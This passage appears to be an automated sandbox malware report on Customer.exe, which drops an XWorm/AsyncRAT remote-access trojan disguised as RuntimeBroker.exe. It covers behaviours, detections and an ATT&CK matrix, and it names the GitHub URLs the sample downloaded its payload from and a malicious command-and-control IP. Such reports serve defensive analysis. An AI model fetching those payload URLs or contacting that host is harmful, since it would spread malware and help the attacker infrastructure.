            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: RuntimeBroker.exe, 00000006.00000002.4122907822.000000001D45D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.4123167589.000000001D491000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.4122576491.000000001D400000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected XWorm
            Source: Yara matchFile source: 6.0.RuntimeBroker.exe.fb0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000000.1767864196.0000000000FB2000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4116258187.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 7332, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, type: DROPPED

            Remote Access Functionality

            barindex
            Yara detected XWorm
            Source: Yara matchFile source: 6.0.RuntimeBroker.exe.fb0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000000.1767864196.0000000000FB2000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4116258187.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 7332, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, type: DROPPED

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
            Windows Management Instrumentation            		1
            DLL Side-Loading            		11
            Process Injection            		1
            Masquerading            		OS Credential Dumping221
            Security Software Discovery            		Remote Services1
            Screen Capture            		11
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter            		Boot or Logon Initialization Scripts1
            DLL Side-Loading            		1
            Modify Registry            		LSASS Memory1
            Process Discovery            		Remote Desktop Protocol11
            Archive Collected Data            		1
            Non-Standard Port            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
            Disable or Modify Tools            		Security Account Manager131
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive1
            Ingress Tool Transfer            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook131
            Virtualization/Sandbox Evasion            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture2
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Process Injection            		LSA Secrets1
            File and Directory Discovery            		SSHKeylogging113
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Deobfuscate/Decode Files or Information            		Cached Domain Credentials13
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Obfuscated Files or Information            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
            Software Packing            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            DLL Side-Loading            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1585444 Sample: Customer.exe Startdate: 07/01/2025 Architecture: WINDOWS Score: 100 34 raw.githubusercontent.com 2->34 36 github.com 2->36 44 Suricata IDS alerts for network traffic 2->44 46 Found malware configuration 2->46 48 Malicious sample detected (through community Yara rule) 2->48 50 12 other signatures 2->50 8 Customer.exe 14 22 2->8         started        signatures3 process4 dnsIp5 38 github.com 140.82.121.4, 443, 49735 GITHUBUS United States 8->38 40 raw.githubusercontent.com 185.199.111.133, 443, 49736 FASTLYUS Netherlands 8->40 28 C:\Users\user\AppData\...\RuntimeBroker.exe, PE32 8->28 dropped 30 C:\Users\user\AppData\...\1ogmnitn.cmdline, Unicode 8->30 dropped 32 C:\Users\user\AppData\...\Customer.exe.log, CSV 8->32 dropped 52 Loading BitLocker PowerShell Module 8->52 54 Reads the Security eventlog 8->54 56 Reads the System eventlog 8->56 13 RuntimeBroker.exe 1 2 8->13         started        17 csc.exe 3 8->17         started        20 WmiPrvSE.exe 8->20         started        file6 signatures7 process8 dnsIp9 42 147.124.210.158, 49737, 50010, 50011 AC-AS-1US United States 13->42 58 Antivirus detection for dropped file 13->58 60 Multi AV Scanner detection for dropped file 13->60 62 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 13->62 64 Machine Learning detection for dropped file 13->64 26 C:\Users\user\AppData\Local\...\1ogmnitn.dll, PE32 17->26 dropped 22 conhost.exe 17->22         started        24 cvtres.exe 1 17->24         started        file10 signatures11 process12

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Customer.exe50%ReversingLabsWin32.Backdoor.Xworm
            Customer.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe100%AviraHEUR/AGEN.1305769
            C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe91%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            147.124.210.1580%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            github.com
            		140.82.121.4
            		truefalse
              		high
              raw.githubusercontent.com
              		185.199.111.133
              		truefalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://raw.githubusercontent.com/rosarioian181/meeekone/refs/heads/pivoc-pages/XClient.exefalse
                  		high
                  147.124.210.158true
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/rosarioian181/meeekone/raw/refs/heads/pivoc-pages/XClient.exefalse
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://nuget.org/NuGet.exeCustomer.exe, 00000000.00000002.1772902620.0000000012FD5000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.apache.org/licenses/LICENSE-2.0Customer.exe, 00000000.00000002.1779344465.000000001DAB2000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.fontbureau.comCustomer.exe, 00000000.00000002.1779344465.000000001DAB2000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.fontbureau.com/designersGCustomer.exe, 00000000.00000002.1779344465.000000001DAB2000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.fontbureau.com/designers/?Customer.exe, 00000000.00000002.1779344465.000000001DAB2000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.founder.com.cn/cn/bTheCustomer.exe, 00000000.00000002.1779344465.000000001DAB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://pesterbdd.com/images/Pester.pngCustomer.exe, 00000000.00000002.1769141993.0000000003183000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://schemas.xmlsoap.org/soap/encoding/Customer.exe, 00000000.00000002.1769141993.0000000003183000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.apache.org/licenses/LICENSE-2.0.htmlCustomer.exe, 00000000.00000002.1769141993.0000000003183000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.fontbureau.com/designers?Customer.exe, 00000000.00000002.1779344465.000000001DAB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://github.comCustomer.exe, 00000000.00000002.1769141993.0000000003C60000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://contoso.com/LicenseCustomer.exe, 00000000.00000002.1772902620.0000000012FD5000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://contoso.com/IconCustomer.exe, 00000000.00000002.1772902620.0000000012FD5000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.tiro.comCustomer.exe, 00000000.00000002.1779344465.000000001DAB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.fontbureau.com/designersCustomer.exe, 00000000.00000002.1779344465.000000001DAB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.goodfont.co.krCustomer.exe, 00000000.00000002.1779344465.000000001DAB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://github.com/Pester/PesterCustomer.exe, 00000000.00000002.1769141993.0000000003183000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.carterandcone.comlCustomer.exe, 00000000.00000002.1779344465.000000001DAB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.sajatypeworks.comCustomer.exe, 00000000.00000002.1779344465.000000001DAB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.typography.netDCustomer.exe, 00000000.00000002.1779344465.000000001DAB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://github.comCustomer.exe, 00000000.00000002.1769141993.0000000003CA9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.fontbureau.com/designers/cabarga.htmlNCustomer.exe, 00000000.00000002.1779344465.000000001DAB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.founder.com.cn/cn/cTheCustomer.exe, 00000000.00000002.1779344465.000000001DAB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.galapagosdesign.com/staff/dennis.htmCustomer.exe, 00000000.00000002.1779344465.000000001DAB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.founder.com.cn/cnCustomer.exe, 00000000.00000002.1779344465.000000001DAB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.fontbureau.com/designers/frere-user.htmlCustomer.exe, 00000000.00000002.1779344465.000000001DAB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://raw.githubusercontent.comCustomer.exe, 00000000.00000002.1769141993.0000000003CD5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://schemas.xmlsoap.org/wsdl/Customer.exe, 00000000.00000002.1769141993.0000000003183000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.jiyu-kobo.co.jp/Customer.exe, 00000000.00000002.1779344465.000000001DAB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://contoso.com/Customer.exe, 00000000.00000002.1772902620.0000000012FD5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://nuget.org/nuget.exeCustomer.exe, 00000000.00000002.1772902620.0000000012FD5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://raw.githubusercontent.comCustomer.exe, 00000000.00000002.1769141993.0000000003CEA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.galapagosdesign.com/DPleaseCustomer.exe, 00000000.00000002.1779344465.000000001DAB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.fontbureau.com/designers8Customer.exe, 00000000.00000002.1779344465.000000001DAB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://www.fonts.comCustomer.exe, 00000000.00000002.1779344465.000000001DAB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.sandoll.co.krCustomer.exe, 00000000.00000002.1779344465.000000001DAB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.urwpp.deDPleaseCustomer.exe, 00000000.00000002.1779344465.000000001DAB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.zhongyicts.com.cnCustomer.exe, 00000000.00000002.1779344465.000000001DAB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameCustomer.exe, 00000000.00000002.1769141993.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.4116258187.00000000033A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.sakkal.comCustomer.exe, 00000000.00000002.1779344465.000000001DAB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high

                                                                                                    World Map of Contacted IPs

                                                                                                    • No. of IPs < 25%
                                                                                                    • 25% < No. of IPs < 50%
                                                                                                    • 50% < No. of IPs < 75%
                                                                                                    • 75% < No. of IPs

                                                                                                    Public IPs

                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                    147.124.210.158
                                                                                                    		unknownUnited States
                                                                                                    		1432AC-AS-1UStrue
                                                                                                    140.82.121.4
                                                                                                    		github.comUnited States
                                                                                                    		36459GITHUBUSfalse
                                                                                                    185.199.111.133
                                                                                                    		raw.githubusercontent.comNetherlands
                                                                                                    		54113FASTLYUSfalse

                                                                                                    General Information

                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                    Analysis ID:1585444
                                                                                                    Start date and time:2025-01-07 17:01:07 +01:00
                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                    Overall analysis duration:0h 7m 39s
                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                    Report type:full
                                                                                                    Cookbook file name:default.jbs
                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                    Number of analysed new started processes analysed:11
                                                                                                    Number of new started drivers analysed:0
                                                                                                    Number of existing processes analysed:0
                                                                                                    Number of existing drivers analysed:0
                                                                                                    Number of injected processes analysed:0
                                                                                                    Technologies:
                                                                                                    • HCA enabled
                                                                                                    • EGA enabled
                                                                                                    • AMSI enabled
                                                                                                    Analysis Mode:default
                                                                                                    Analysis stop reason:Timeout
                                                                                                    Sample name:Customer.exe
                                                                                                    Detection:MAL
                                                                                                    Classification:mal100.troj.spyw.expl.evad.winEXE@9/12@2/3
                                                                                                    EGA Information:Failed
                                                                                                    HCA Information:
                                                                                                    • Successful, ratio: 99%
                                                                                                    • Number of executed functions: 126
                                                                                                    • Number of non-executed functions: 1
                                                                                                    Cookbook Comments:
                                                                                                    • Found application associated with file extension: .exe
                                                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                    Warnings

                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                    • Excluded IPs from analysis (whitelisted): 23.56.254.164, 20.109.210.53, 13.107.246.45
                                                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                    • Execution Graph export aborted for target Customer.exe, PID 7716 because it is empty
                                                                                                    • Execution Graph export aborted for target RuntimeBroker.exe, PID 7332 because it is empty
                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                    • VT rate limit hit for: Customer.exe

                                                                                                    Simulations

                                                                                                    Behavior and APIs

                                                                                                    TimeTypeDescription
                                                                                                    11:01:56API Interceptor22x Sleep call for process: Customer.exe modified
                                                                                                    11:02:09API Interceptor12253449x Sleep call for process: RuntimeBroker.exe modified

                                                                                                    Joe Sandbox View / Context

                                                                                                    IPs

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    140.82.121.4RfORrHIRNe.docGet hashmaliciousUnknownBrowse
                                                                                                    • github.com/ssbb36/stv/raw/main/5.mp3
                                                                                                    185.199.111.133cr_asm2.ps1Get hashmaliciousUnknownBrowse
                                                                                                    • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                    cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                                                    • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                    cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                                                    • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                    BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                    • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt

                                                                                                    Domains

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    raw.githubusercontent.comSolara Bootstrapper.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 185.199.109.133
                                                                                                    Solara.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 185.199.108.133
                                                                                                    3lhrJ4X.exeGet hashmaliciousLiteHTTP BotBrowse
                                                                                                    • 185.199.111.133
                                                                                                    dGhlYXB0Z3JvdXA=-free.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 185.199.109.133
                                                                                                    dGhlYXB0Z3JvdXA=-free.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 185.199.110.133
                                                                                                    Gz1bBIg2Tw.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 185.199.109.133
                                                                                                    ipmsg5.6.18_installer.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 185.199.111.133
                                                                                                    over.ps1Get hashmaliciousVidarBrowse
                                                                                                    • 185.199.109.133
                                                                                                    Epsilon.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 185.199.111.133
                                                                                                    eXbhgU9.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 185.199.110.133
                                                                                                    github.comSolara Bootstrapper.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 140.82.121.3
                                                                                                    Solara.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 140.82.121.4
                                                                                                    https://github.com/eclipse-ecal/ecal/releases/download/v5.13.3/ecal_5.13.3-win64.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 140.82.121.3
                                                                                                    PO#6100008 Jan04.02.2024.Xls.jsGet hashmaliciousWSHRat, STRRATBrowse
                                                                                                    • 140.82.121.4
                                                                                                    ebjtOH70jl.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                    • 140.82.121.3
                                                                                                    Gz1bBIg2Tw.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 140.82.121.4
                                                                                                    ipmsg5.6.18_installer.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 140.82.121.3
                                                                                                    eXbhgU9.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 140.82.121.4
                                                                                                    fxsound_setup.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 20.233.83.145
                                                                                                    Electrum-bch-4.4.2-x86_64.AppImage.elfGet hashmaliciousUnknownBrowse
                                                                                                    • 185.199.111.133

                                                                                                    ASNs

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    FASTLYUShttps://www.kentuckyfriedsalmonpadon.com/caHbBZmGet hashmaliciousUnknownBrowse
                                                                                                    • 151.101.64.84
                                                                                                    Solara Bootstrapper.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 185.199.109.133
                                                                                                    Solara.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 185.199.108.133
                                                                                                    Airbornemx_PAYOUT7370.odtGet hashmaliciousUnknownBrowse
                                                                                                    • 151.101.2.137
                                                                                                    https://coggle.it/diagram/Z3zkZPAQxQkDOgmo/t/-/1f6434bfba7d8aab898b2531849681e8b0d7342489acbbff6b172f8658a09526Get hashmaliciousUnknownBrowse
                                                                                                    • 151.101.128.176
                                                                                                    https://email.garagesalefinder.com/c/eJyMU92OsjoUfZp6xwRaoO2FF-XPYT4VnXHQ8caUFivK3wcC-vYnzImc25OQlbXYa-_VJrtyniCCZ-ncwMg2KKWmPrvMCRWYGDSBBAkLnSGigttEUJpiLHRhzLK5JRHWEbE0wS1LkxzqmpnKRCMYcymIhUyJgKkr3nCVtjxPz1kp0-ZNVMUsn1_u9xogBmAAYDAMw5uqKpWnXLZp02cibUcfgEHNVcolgAEX-Q2goOUAeUsAbZ4B5Lma-bXS9YjEH8_jUsCMDFHdh-8V6xawX6ug4FFt3FtnCCFin8wJow2-DWulyU1_iVhfsfe8SpYtI8px_iiPHZXv8Movh2Cj-95Hcj0kV7urV6jyYvatjOfWaYZ2MRxIba6V3Jx55O3PcZmp2muai3lerzYyDgu0zWKnNlb-o7Sf7h6p70NxCvM23_41HfOEGuWGy9q9Hnlqfep7pO0Kfgrvm-rvV7zTOloie11_fJdEol2uDrr9xfmOPrr1Vr-IJWM_mXjnt9SPV5IVx53pOD-UrUI1qHwX-N2-JfHP9ThUm97B9z_nIOnjcuOGjloo51Iwxy6FckMA7bIrAPIMAG2RSYA8a5H18gTbKy737aLto4f-0GD3DaDdZgogj0WebZ6M8IN8ys_TY2eziPTBe70KjWKtt8gaxll5lpZ3gDzBtbpLNBsalBgGNrFuUoTHOC67JgfIGzehnVYBQAtjAC37l8GRuSOYU4G-pG2NgEYgk_ReFjwWsPli0J_MwSSdVxuc_v2bYU25I0BvMvvT0fBL_tdrsyktMAglv0Qs4o5D0vHD8ZIUFG4XwVMUFP0UQcef1jWBOkDea447drMR_PHuZATmTlIH0KIMQPP3-3_uWTOv0_JWvWU9L6semDpvmmpIeHn7fYv9HP4TAAD__7e2IkMGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 151.101.2.137
                                                                                                    Onedrive Shared document.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 151.101.2.137
                                                                                                    Quarantined Messages(3).zipGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 151.101.194.137
                                                                                                    Sales Acknowledgement - HES #982323.pdfGet hashmaliciousUnknownBrowse
                                                                                                    • 151.101.129.140
                                                                                                    https://docs.google.com/presentation/d/e/2PACX-1vT2PGn0zBbaptqxmzd37o4wD_789vdOk0IyvB9NJB93qGFh_af8Du5RuZX0G1lsycIP1UzhONEj31sn/pub?start=false&loop=false&delayms=3000Get hashmaliciousUnknownBrowse
                                                                                                    • 151.101.194.137
                                                                                                    AC-AS-1USENQ-0092025.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 147.124.216.113
                                                                                                    ITT # KRPBV2663 .docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 147.124.216.113
                                                                                                    PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 147.124.216.113
                                                                                                    ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                    • 147.124.39.73
                                                                                                    loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                    • 65.217.170.6
                                                                                                    scheduledllama.exeGet hashmaliciousRedLineBrowse
                                                                                                    • 147.124.222.241
                                                                                                    i686.elfGet hashmaliciousUnknownBrowse
                                                                                                    • 147.124.15.84
                                                                                                    5r3fqt67ew531has4231.m68k.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                    • 147.124.15.46
                                                                                                    lIocM276SA.exeGet hashmaliciousRemcos, Amadey, LummaC Stealer, Stealc, WhiteSnake StealerBrowse
                                                                                                    • 147.124.221.201
                                                                                                    file.exeGet hashmaliciousLummaC, Remcos, Amadey, LummaC Stealer, Stealc, Vidar, WhiteSnake StealerBrowse
                                                                                                    • 147.124.221.201
                                                                                                    GITHUBUSSolara Bootstrapper.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 140.82.121.3
                                                                                                    Solara.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 140.82.121.4
                                                                                                    https://github.com/eclipse-ecal/ecal/releases/download/v5.13.3/ecal_5.13.3-win64.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 140.82.121.3
                                                                                                    PO#6100008 Jan04.02.2024.Xls.jsGet hashmaliciousWSHRat, STRRATBrowse
                                                                                                    • 140.82.121.4
                                                                                                    ebjtOH70jl.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                    • 140.82.121.3
                                                                                                    Gz1bBIg2Tw.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 140.82.121.4
                                                                                                    ipmsg5.6.18_installer.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 140.82.121.3
                                                                                                    EdYEXasNiR.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                    • 140.82.121.3
                                                                                                    5EfYBe3nch.exeGet hashmaliciousLummaC, Amadey, Babadeda, LiteHTTP Bot, LummaC Stealer, Poverty Stealer, StealcBrowse
                                                                                                    • 140.82.121.3
                                                                                                    eXbhgU9.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 140.82.121.4

                                                                                                    JA3 Fingerprints

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    3b5074b1b5d032e5620f69f9f700ff0eSolara Bootstrapper.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 185.199.111.133
                                                                                                    • 140.82.121.4
                                                                                                    Solara.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 185.199.111.133
                                                                                                    • 140.82.121.4
                                                                                                    vRecording__0023secs__Stgusa.htmlGet hashmaliciousUnknownBrowse
                                                                                                    • 185.199.111.133
                                                                                                    • 140.82.121.4
                                                                                                    ENQ-0092025.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 185.199.111.133
                                                                                                    • 140.82.121.4
                                                                                                    U1P3u1tkB2.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 185.199.111.133
                                                                                                    • 140.82.121.4
                                                                                                    U1P3u1tkB2.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 185.199.111.133
                                                                                                    • 140.82.121.4
                                                                                                    9876567899.bat.exeGet hashmaliciousLokibotBrowse
                                                                                                    • 185.199.111.133
                                                                                                    • 140.82.121.4
